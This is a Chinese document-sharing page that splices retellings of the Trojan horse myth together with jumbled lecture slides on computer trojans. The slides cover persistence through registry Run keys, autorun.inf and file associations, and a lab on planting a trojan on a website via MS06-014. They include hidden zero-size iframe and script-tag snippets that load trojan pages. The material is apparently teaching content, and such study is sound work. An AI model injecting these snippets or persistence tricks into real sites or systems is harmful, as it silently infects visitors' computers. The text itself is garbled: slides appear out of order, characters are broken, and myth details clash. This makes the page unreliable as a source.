特洛伊木马
木马分析
5.5木马技术5.5.1 木马技术概述木马的全称是“特洛伊木马”(Trojan horse),来源于希腊神话。
古希腊围攻特洛伊城多年无法攻下,于是有人献出木马计策,让士兵藏匿于巨大的木马中,然后佯作退兵,城中得知解围的消息后,将“木马”作为战利品拖入城内,匿于木马中的将士出来开启城门,与城外部队里应外合攻下特洛伊城,后世称这只大木马为“特洛伊木马”。
网络世界的特洛伊木马是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和DoS攻击等特殊功能的后门程序。
它与控制主机之间建立起连接,使得控制者能够通过网络控制受害系统,通信遵照TCP/IP协议,最大的特征在于隐秘性,偷偷混入对方的主机里面,但是却没有被对方发现。
就象一个潜入敌方的间谍,为其他人的攻击打开后门,这与战争中的木马战术十分相似,因而得名木马程序。
实际上计算机网络木马不但可以窃取、破坏被植入主机的信息,而且可以通过控制主机来攻击网络中的其它主机。
木马程序不仅可能侵害到个人乃至某些公司的利益和权力,更可能危及整个社会和国家的利益和安全。
如果公安部用于采集处理人们身份证信息的计算机被安装了木马,那么这些信息就可能被木马以有线或无线的方式通过网络泄露出去,后果不堪设想。
木马是受控的,它能分清敌我,所以与分不清敌我的其它病毒和攻击技术相比,具有更大的危险性和破坏性。
木马是近几年比较流行的危害程度较严重的恶意软件,常被用作网络系统入侵的重要工具和手段。
2008年金山病毒报告监测显示,木马攻击占当前网络病毒的70%以上,已经成为当前网络危害最严重的网络病毒。
网络上各种“种马”技术加剧了木马的流行和发展,由于木马控制了被植入者的计算机,它几乎可以在被植入主机上为所欲为,破坏程度非常巨大,可以窃取账号密码、删除文件、格式化磁盘,甚至可以打开摄像头进行偷窥等;木马往往又被用做后门,植入被攻击的系统,以便为入侵者再次访问系统提供方便;或者利用被入侵的系统,通过欺骗合法用户的某种方式暗中“散发”木马,以便进一步扩大入侵成果和入侵范围,为进行其它入侵活动,如分布式拒绝服务攻击(DDoS)等提供可能。
特洛伊木马
特洛伊木马(Trojan horse)传说古希腊传说,特洛伊王子帕里斯访问希腊,诱走了王后海伦,希腊人因此远征特洛伊。
围攻9年后,到第10年,希腊将领奥德修斯献了一计,就是把一批勇士埋伏在一匹巨大的木马腹内,放在城外后,佯作退兵。
特洛伊人以为敌兵已退,就把木马作为战利品搬入城中。
到了夜间,埋伏在木马中的勇士跳出来,打开了城门,希腊将士一拥而入攻下了城池。
后来,人们在写文章时,就常用“特洛伊木马”这一典故,用来比喻在敌方营垒里埋下伏兵里应外合的活动。
电脑中的特洛伊木马特洛伊木马没有复制能力,它的特点是伪装成一个实用工具或者一个可爱的游戏,这会诱使用户将其安装在PC或者服务器上。
“特洛伊木马”(trojan horse)简称“木马”,据说这个名称来源于希腊神话《木马屠城记》。
古希腊有大军围攻特洛伊城,久久无法攻下。
于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。
城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。
到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。
后世称这只大木马为“特洛伊木马”。
如今黑客程序借用其名,有“一经潜入,后患无穷”之意。
完整的木马程序一般由两个部分组成:一个是服务器端,一个是控制器端。
“中了木马”就是指安装了木马的客户端程序,若你的电脑被安装了客户端程序,则拥有相应服务器端的人就可以通过网络控制你的电脑、为所欲为,这时你电脑上的各种文件、程序,以及在你电脑上使用的账号、密码无安全可言了。
木马程序不能算是一种病毒,但可以和最新病毒、漏洞利用工具一起使用用,几乎可以躲过各大杀毒软件,尽管现在越来越多的新版的杀毒软件,可以查杀一些防杀木马了,所以不要认为使用有名的杀毒软件电脑就绝对安全,木马永远是防不胜防的,除非你不上网。
特洛伊木马故事
特洛伊木马故事特洛伊木马,是古希腊传说中的一个著名故事,它发生在特洛伊战争时期。
特洛伊战争是古希腊历史上一段著名的战争史诗,而特洛伊木马更是其中一个扣人心弦的传奇。
故事的背景是这样的,古希腊的阿伽门农王子帕里斯因为爱上了特洛伊国王普里阿摩的妻子海伦,而绑架了她。
这件事引起了古希腊的愤怒,于是他们组成联军,前往特洛伊国进行战争。
可是,特洛伊城墙坚固,又有英勇善战的英雄赫克托耳相助,使得古希腊联军一直无法攻破特洛伊城。
在战争进行到第十年的时候,古希腊的智者奥德修斯提出了一个计划,他建议联军制造一个巨大的木马,然后将精壮的士兵藏在木马内部,送给特洛伊国作为和平的礼物。
特洛伊国王普里阿摩听信了希腊人的谎言,决定将木马带入城内。
于是,特洛伊人打开城门,将木马拉入城内,不久之后,特洛伊人们举行盛大的庆祝活动,庆祝他们取得了胜利。
然而,当夜幕降临时,希腊士兵们从木马内跳了出来,他们放开城门,让联军的士兵们涌入特洛伊城。
特洛伊人们大惊失色,但已经为时已晚,特洛伊城被古希腊联军攻破,城内的人们几乎全部被屠杀,特洛伊城被夷为平地。
特洛伊木马故事告诉我们,不要轻易相信别人的美言,更不要被表面的表象所迷惑。
在现实生活中,我们也要学会警惕,不要被外表所蒙蔽,要学会从事物的内在本质出发,这样才能更好地保护自己,避免受到伤害。
特洛伊木马故事也告诉我们,战争是残酷的,它会给人们带来巨大的痛苦和损失。
在现实生活中,我们要珍爱和平,避免战争的发生,尊重他人,解决分歧,共同构建和谐的社会环境。
特洛伊木马故事是古希腊文学中的一颗璀璨明珠,它不仅是一则传奇故事,更是一部关于智慧、勇气和警示的故事。
让我们铭记这个古老的传说,从中汲取智慧,引以为戒,让我们的生活更加美好。
特洛伊木马典故
特洛伊木马典故特洛伊木马的故事是在古希腊传说中,希腊联军围困特洛伊久攻不下,于是假装撤离,留下一具巨大的中空木马,特洛伊守军不知是计,把木马运进城中作为战利品。
更深夜静之际,木马腹中潜藏的希腊士兵翻开城门,特洛伊陷落。
下边是给大家整理的特洛伊木马典故,供大家阅读 !特洛伊城是个十分坚固的城市,希腊人牺牲了众多将士,一连攻打了九年也没有取获成功。
第十年,希腊军多谋善断的将领奥德修斯想出了一条妙策。
一天,希腊联军忽然扬帆走开了特洛伊邻近的海面,只留下一匹巨大的木马。
特洛伊人以为频频失败的希腊人没心打仗,撤兵归国,于是跑到城外探个终究。
特洛伊人看到木马特别惊讶,他们实在不知道木马的用途。
有人主张把它看作战利品拉进城去,有人建议把它烧掉或许推到海里。
就在人们谈论纷繁,举棋不定的时候,几个牧人抓到一个希腊人(希腊人留下的间谍)。
他对特洛伊人说:“这匹木马是希腊人献给雅典娜女神的。
他们成心把它留下来,以为你们一定会毁掉它。
这样就会惹起天神的愤慨。
假如把木马拉进城,特洛伊就会遇到神的保护。
为了让你们的行为惹起天神的愤慨,所以成心把马造得特别巨大,这样你们就没法把木马拉进城去。
”希腊人的这番话说服了国王普里阿墨斯。
他嘱咐放了那个俘虏,而且命令把木马弄进城去。
国王相信了这番话,正准备把木马拉进城时,祭司拉奥孔跑来遏止,他以为应当立刻把木马烧掉。
木马发出了可怕的响声,这时从海里窜出两条毒蛇,扑向拉奥孔和他的两个儿子。
拉奥孔父子拼死和巨蛇格斗,但很快被蛇缠死了。
两条巨蛇冷静地钻到雅典娜女神的塑像下,不见了。
人们以为因为拉奥孔思疑木马所以致使父子三人的凄惨遭受,所以更为相信希腊间谍的话。
特洛伊人在木马下边装上轮子,用力把木马往城里拉。
因为木马太巨大,城门口进不去,只能推倒一段城墙。
特洛伊人把木马放在雅典娜神庙邻近。
希腊联军一败涂地,特洛伊城终于安然无事了,特洛伊人高高兴兴,举行了浩大的庆贺活动。
自以为取获成功的特洛伊人放松了警惕,欢庆事后,人们放心地入眠了。
特洛伊木马
• 木马通道与远程控制
– 木马连接建立后,控制端端口和服务端木马端口之间将会出现一 条通道 – 控制端上的控制端程序可藉这条通道与服务端上的木马程序取得 联系,并通过木马程序对服务端进行远程控制,实现的远程控制 就如同本地操作
控制端 控制端 程序 1096 6267 服务端 木马 程序 窃取密码 文件操作 修改注册表 系统操作
32
网页挂马技术(二)
• js调用型网页挂马
– 利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术
<script language=javascript
src=/gm.js></script>
/gm.js就是一个js脚本文件,通过它调用和执行木 马的服务端。这些js文件一般都可以通过工具生成,攻击者只需输入相关 的选项就可以了
5
木马入侵基本过程
控制端 ①配置木马 ②传播木马 ③运行木马 Internet 木马 服务端
④信息反馈
信息
⑤建立连接
⑥远程控制
6
netstat查看木马打开的端口
Proto ① TCP ② TCP Local Address 202.102.47.56 : 6267 202.102.47.56 : 6267 服务端 IP地址 木马 端口 Foreign Address 202.96.96.102 : 1096 0.0.0.0 控制端 IP地址 控制端 端口 State ESTABLISHED LISTENING 连接状态: ①连接已建立 ②等待连接
33
网页挂马技术(三)
• 图片伪装挂马
– 攻击者直接将网页木马加载到图片中
/test.htm中的木马代码植入到test.jpg图片文件中
关于特洛伊木马的故事
关于特洛伊木马的故事据说特洛伊木马的故事有多种版本形式,是一则传奇神话故事。
今天小编在这分享一些关于特洛伊木马的故事给大家,欢迎大家阅读!特洛伊木马的故事(一):大约在公元前13世纪,据说斯巴达有一人家生了个女儿,取名海伦。
这小姑娘俏丽无比,渐渐长成一个举世罕见的美女。
人人都公认她是全希腊各国最美丽的女子。
希腊各国的公子王孙们都纷纷追求她,追求不成者也以看到她的芳容为一生最大的愿望。
海伦成了各国公子王孙们的偶像和精心保护的珍宝。
之后,海伦的未婚者们达成了协议:让海伦自己选取丈夫,大家保证尊重她的选取,而且要共同保护她丈夫的权利。
之后,斯巴达王阿特柔斯的儿子墨涅依斯为海伦看中,两人成亲。
不久,墨涅依斯做了国王,两人相亲相爱,是一对美满的夫妻。
一天,墨涅依斯的王宫里来了一位尊贵的客人。
他是特洛伊国王的儿子——帕里斯。
特洛伊是小亚细亚半岛(今土耳其)上的一个小王国,它和希腊隔海相望。
墨涅依斯对帕里斯盛情款待,连年轻的王后海伦也亲自出来接见。
帕里斯长得风度翩翩,风流潇洒,很讨女人喜欢。
海伦和他一见钟情,竟鬼迷心窍地和帕里斯一齐逃回特洛伊城了。
帕里斯还掠走了王宫中的许多财宝。
斯巴达国王墨涅依斯觉得这是一个极大的侮辱,他连夜赶到迈锡城,请国王阿伽门农,也是他的哥哥帮他复仇。
阿伽门农当时是希腊各国的霸主,他立刻邀请了希腊许多小国的国王来开会,会上大家决定联合起来,用武力消灭特洛伊城。
阿伽门农被推选为统帅。
不久,一支有10万人马,一千多条战舰的大军,浩浩荡荡地攻打特洛伊城去了。
希腊人和特洛伊人的战争爆发了。
希腊人认为,世界上的一切事情都是由神安排的,他们给这场战争的起因编了个美丽的神话。
神话中说,英雄阿喀琉斯的父母——国王珀琉斯和海中女神的女儿忒提斯举行婚礼,奥林匹斯山上的许多神仙都应邀而来了。
宴会十分热闹。
忽然,来了一位怒气冲冲的女神,她把一个金苹果扔在桌子上,上面刻着一行字:“给最美丽的女神”。
扔苹果的女神是“争吵女神”。
特洛伊木马物理数学
特洛伊木马物理数学特洛伊木马,这个故事大家应该都听过吧,古代希腊那些英雄们为了攻下特洛伊城,想出了一个绝妙的主意,真是让人拍手称赞。
想想看,居然能用一座大木马来欺骗敌人,这可真是出乎意料。
那些希腊人真是聪明绝顶,像猴子一样灵活,居然能想到用这种方式。
你说,平时打仗就得拼个你死我活,结果竟然来了一场“兵不血刃”的戏码,这心机,简直让人佩服得五体投地。
那么这木马到底有什么魔力呢?那可是个庞然大物,外表看上去就是个艺术品,特洛伊人看到这玩意儿,心里肯定想着:“哎呀,这可真是个礼物啊,快来看看。
”就像你路过一家店,看到一个新出的玩具,心里忍不住想买回家,结果却没想到这是个圈套。
这一招可真是把敌人给迷得神魂颠倒。
想象一下,木马里面藏着一群希腊战士,个个心里直打鼓,想要一跃而出。
真是让人捏一把汗啊。
不过说到这,木马本身其实也是个很有意思的物理问题。
想象一下,那种巨大的木头结构,是不是得考虑到很多力学的原理?木头的密度、抗压能力、重量的分配,这些都得想得周到。
要不然,一旦出现点小问题,希腊战士就得变成“木头人”了。
像个沙包一样,被人一戳就崩了,真是哭笑不得。
再说了,特洛伊人也是太天真了,看到这么大的木马,居然没想到里面会藏人。
就像你家门口放了个大箱子,你偏偏没打算打开,觉得反正是送来的,怎么会有什么问题呢?这种心理,简直是“看见树木不见森林”,真是要笑死个人。
要是我在那儿,肯定得先把箱子打开,看看里面是不是藏着个猛兽,或是有什么阴险的东西,绝对不能掉以轻心。
想想那个场景,特洛伊人庆祝胜利,把木马拖进城里,正准备开庆祝派对,结果没过多久,木马里面的战士们就出来了,嘿!这一下子,真是让人措手不及。
古代人打仗,可没现代科技那么发达,所有的战斗都是近身肉搏。
一下子就被希腊人给扑了个措手不及。
像极了我们现在打游戏,明明占了上风,结果却被一波操作给翻盘,心里那个怨气,真是无法言喻。
特洛伊木马的故事告诉我们,面对看似无害的东西,永远不能掉以轻心。
特洛伊木马故事
特洛伊木马故事
特洛伊木马是一部古希腊神话《伊里亚特》中著名的故事,它也成为了后来特洛伊战争的象征。
故事发生在公元前12世纪,当时古希腊的玛吉亚王子帕里斯
从斯巴达国王的妻子海伦那里偷走了她。
为了夺回美女海伦,古希腊的各个城邦联合起来,形成了古希腊联军。
然而,特洛伊城却有强大的城墙,几乎无法攻破。
于是,联军经过长时间的围困无果后,决定采取计谋。
他们制造了一匹巨大的木马,里面藏有一些精壮的希腊士兵。
其他希腊士兵则假装离开,使得特洛伊人误以为他们已经放弃围攻。
特洛伊人在发现木马后,将其拉入城中,将其当作战利品和神像供奉。
但是,夜晚时,希腊士兵从木马中出来,打开城门,让联军进城。
在特洛伊人陷入熟睡后,联军开始了猛烈的攻击。
特洛伊城的防卫毫无准备,联军成功地夺取了城市。
这个故事也揭示了特洛伊城的灭亡和希腊人重新获得海伦的情节。
特洛伊木马故事象征着用计谋征服敌人,也成为了历史上计谋成功的经典案例之一。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
网络钓鱼挂马
网络中最常见的欺骗手段,黑客们利用人们的猎 奇、贪心等心理伪装构造一个链接或者一个网页, 利用社会工程学欺骗方法,引诱点击,当用户打 开一个看似正常的页面时,网页代码随之运行, 隐蔽性极高。
伪装挂马
高级欺骗,黑客利用IE或者Fixfox浏览器的设计 缺陷制造的一种高级欺骗技术,当用户访问木马 页面时地址栏显示或者 等用户信任地址,其实却 打开了被挂马的页面,从而实现欺骗。
• 第四阶段在进程隐藏方面做了非常大的改动,采用了 内核插入式的嵌入方式,利用远程插入线程技术嵌入 DLL线程,或者挂接PSAPI实现木马程序的隐藏。即 使在Windows NT/2K下,这些技术都达到了良好的隐 藏效果。
• 相信,第五代木马的技术更加先进。
木马的关键技术
——植入技术
植入技术
升级植入:打补丁是目前内核及功能升级重要途 径。由于升级包发布途径不严格且非常复杂,因 此,这将成为传播木马的一个有效途径。 网站(网页)植入:网站挂马是传播木马的最佳 途径之一。把木马连接潜入到网站上,当用户访 问该网站时,把木马自动种植到用户的计算机上。 在辅助以附加手段的前提下,该方法也可以实现 定点植入。 漏洞植入:木马通过操作系统的漏洞直接传播给 计算机,其中间桥梁是诸如局域网、Internet、 WiFi、蓝牙、红外等网络连接。
木马检测、清除、防范
• 关键技术、实用工具、防范
怎样才能使计算机更安全?
木马的介绍
概念
特洛伊木马(Trojan Horse) :是一种与远程计算 机之间建立起连接,使远程计算机能够通过网络 控制用户计算机系统并且可能造成用户的信息损 失、系统损坏甚至瘫痪的程序。
木马的组成
硬件:控制端、服务端、Internet 软件:控制端程序、木马程序、木马配置程序 连接:控制、服务端IP, 控制、服务端Port
特洛伊木马 (Trojan horse)
《特洛伊木马》电影图片
本章的学习目标
掌握特洛伊木马的概念
了解木马技术的发展趋势 掌握木马开发实例 理解木马的关键技术 掌握木马攻击的方法
掌握木马防范方法
主要内容
木马的介绍
• 定义、分类、进展
木马的关键技术
• 植入技术
• 通信技术 • 隐藏技术
木马实例
• BO2K-开源木马
第一步:检测一下是否存在该漏洞
第二步:准备个简单的木马
该程序是个可执行程序,它要被挂到网站上,等 着别人来上钩。
其功能是:执行后把自己改名字并存储到 System32下;修改注册表,实现自加载。
第三步:核心程序
第四步:进一步伪装
第五步:看看效果吧
演示过程
木马的关键技术
——自加载技术
系统文件加载
3.1 通过注册表中的Run来启动
• (Run), • (RunOnce), • (RunOnceEx), • (RunServices), • (RunServicesOnce)
3.2 通过文件关联启动
• 当用户打开了一个已修改了打开关联的文件时,木马 也就开始了它的运作。
• 选择文件格式中的“打开”、“编辑”、“打印”项 目。
U盘植入:木马先寄宿在计算机或U盘上。当U盘 和计算机连接时,相互传播。该方法利用了U盘 介质的移动性。
程序绑定:传播木马的最佳途径之一。把木马和 常用的共享软件绑定在一起,当用户下载了免费 共享软件并安装或使用时,木马就种植到其计算 机上。
网站挂马
网页挂马就是攻击者通过在正常的页面中(通常 是网站的主页)插入一段代码。浏览者在打开该 页面的时候,这段代码被执行,然后下载并运行 某木马的服务器端程序,进而控制浏览者的主机。
基本特征
1、隐蔽性是其首要的特征
• 木马和远程控制软件的最主要区别 • 不产生图标 • 不出现在任务管理器中。
2、它具有自动运行性
• 启动文件、启动组、注册表
3、木马程序具有欺骗性
• 名字方式:字母“l”与数字“1”、字母“o”与数字“0” • 相同文件名但不同路径 • 常用图标:Zip
4、具备自动恢复功能(高级技术) 5、能自动打开特别的端口 6、功能的特殊性
木马和普通病毒
• 传播性(木马不如病毒) • 两者相互融合 • 木马程序YAI采用了病毒技术 • “红色代码”病毒已经具有木马的远程控制功能
木马的发展趋势
跨平台性
模块化设计 更新更强的感染(传播、植入)模式 即时通知 更强更多的功能
木马的关键技术
技术进展
历史上概括为4个阶段:
• 第一阶段主要实现简单的密码窃取、发送等功能,没 有什么特别之处。 • 第二阶段在技术上有了很大的进步,主要体现在隐藏、 控制等方面。国内冰河可以说是这个阶段的典型代表 之一。 • 第三阶段在数据传递技术上做了不小的改进,出现了 基于ICMP协议的木马,这种木马利用ICMP协议的畸 形报文传递数据,增加了查杀的难度。
网页挂马实验(实验六)
该挂马方法利用了MS06-014漏洞。
该漏洞是Windows的RDS.Dataspace ActiveX实 现上存在漏洞,远程攻击者可能利用此漏洞在获 取主机的控制。 在某些情况下,MDAC所捆绑的RDS.Dataspace ActiveX控件无法确保能够进行安全的交互,导 致远程代码执行漏洞,成功利用这个漏洞的攻பைடு நூலகம் 者可以完全控制受影响的系统。
[实验目的]
通过该实验掌握网站挂马的方法。 [实验环境] Windows 2000 Professional SP4 IIS 5.x
IE 5.x
[实验素材]
附书资源目录 experimemt\ms06014
实验准备
如图,把这些文件用IIS发布。其中WriteReg.exe可以不 发布。WriteReg.exe和WriteReg.pdf内容完全一致,只是 扩展名不同而已。这样做的目的是更加便于隐藏。
响应 响应
服务器 客户机 socket( ) socket( ) bind( ) readfrom( )
阻塞,等待客户数据
bind( )
服务请求 sendto( )
处理服务请求
sendto( ) close( )
服务应答
readfrom( ) close( )
无连接套接应用程序时序图
服务器
• 例如冰河木马病毒
• [HKEY_CLASSES_ROOT\txtfile\shell\open\com mand]中的键值 “c:\windows\notepad.exe %1”, 改为“sysexplr.exe %1”。
4.借助自动运行功能
• 根目录下新建一个Autorun.inf • [autorun] • open=Notepad.exe
原理:在打开插入该句代码的网页后,也就打开 了/muma.html页面,但是由 于它的长和宽都为“0”,所以很难察觉,非常具 有隐蔽性。
js挂马
利用js脚本调用进行的网页挂马技术。攻击者先 制作一个.js文件,然后利用js代码调用到挂马的 网页。
代码如下:
• <script. language=javascript. src=/gm.js></script>
网页挂马的关键技术
框架挂马
js挂马 图片伪装挂马 网络钓鱼挂马 伪装挂马
框架挂马
攻击者利用iframe语句,加载到任意网页中。是 最早也是最有效的的一种网络挂马技术。
代码如下:
• <iframe. src=/muma.html width=0 height=0></iframe>
• <html> • <iframe. src="/test.htm" height=0 width=0> </iframe> • <img src="/test.jpg"></center> • </html>
原理:当用户打开/test.htm时,显示 给用户的是/test.jpg,而 /test.htm网页代码也随之运行。
存在两种网页挂马方式: 传统的直接挂马和新的 间接挂马方式。
传统方式
黑客直接在被 入侵网站上挂 马。影响群体 为直接访问这 个网站的用户。
网页挂马的新方式
被挂马网站是 第三方知名 “统计网站”编 写的用于收集 统计用户浏览 网页数据信息 的代码。黑客 正是利用了这 些统计网站进 行挂马,从而 使得所有使用 了该统计代码 的网站全部都 被间接挂马。
1.修改批处理
• Autoexec.bat(自动批处理,在引导系统时执行) • Winstart.bat(在启动GUI图形界面环境时执行) • Dosstart.bat(在进入MS-DOS方式时执行)
2.修改系统配置
• win.ini文件中的启动加载项:[windwos]段中有如下加 载项:
• run= • Load= • system.ini中的启动加载项:在[BOOT]子项中的 “Shell”项:
• 搜索缓存中的口令、设置口令、扫描目标机器的IP地址、进行键 盘记录、远程注册表的操作、以及锁定鼠标等功能
7、黑客组织趋于公开化
木马的分类
1、远程控制型木马
• BO和冰河
2、发送密码型木马 3、键盘纪录型木马 4、破坏型木马
5、FTP型木马
远程控制、木马与病毒
木马和控制软件
• 目的不同 • 有些木马具有控制软件的所有功能 • 是否隐藏
• shell=
3 修改注册表
• HKEY_CLASSES_ROOT:此处存储的信息可以确保当使用Windows 资源管理器打开文件时,将使用正确的应用程序打开对应的文件类型。 • HKEY_CURRENT_USER:存放当前登录用户的有关信息。用户文件 夹、屏幕颜色和“控制面板”设置存储在此处。该信息被称为用户配置 文件。 • HKEY_LOCAL_MACHINE:包含针对该计算机(对于任何用户)的配 置信息。 • HKEY_USERS:存放计算机上所有用户的配置文件。 • HKEY_CURRENT_CONFIG:包含本地计算机在系统启动时所用的硬 件配置文件信息。 • HKEY_DYN_DATA:记录系统运行时刻的状态。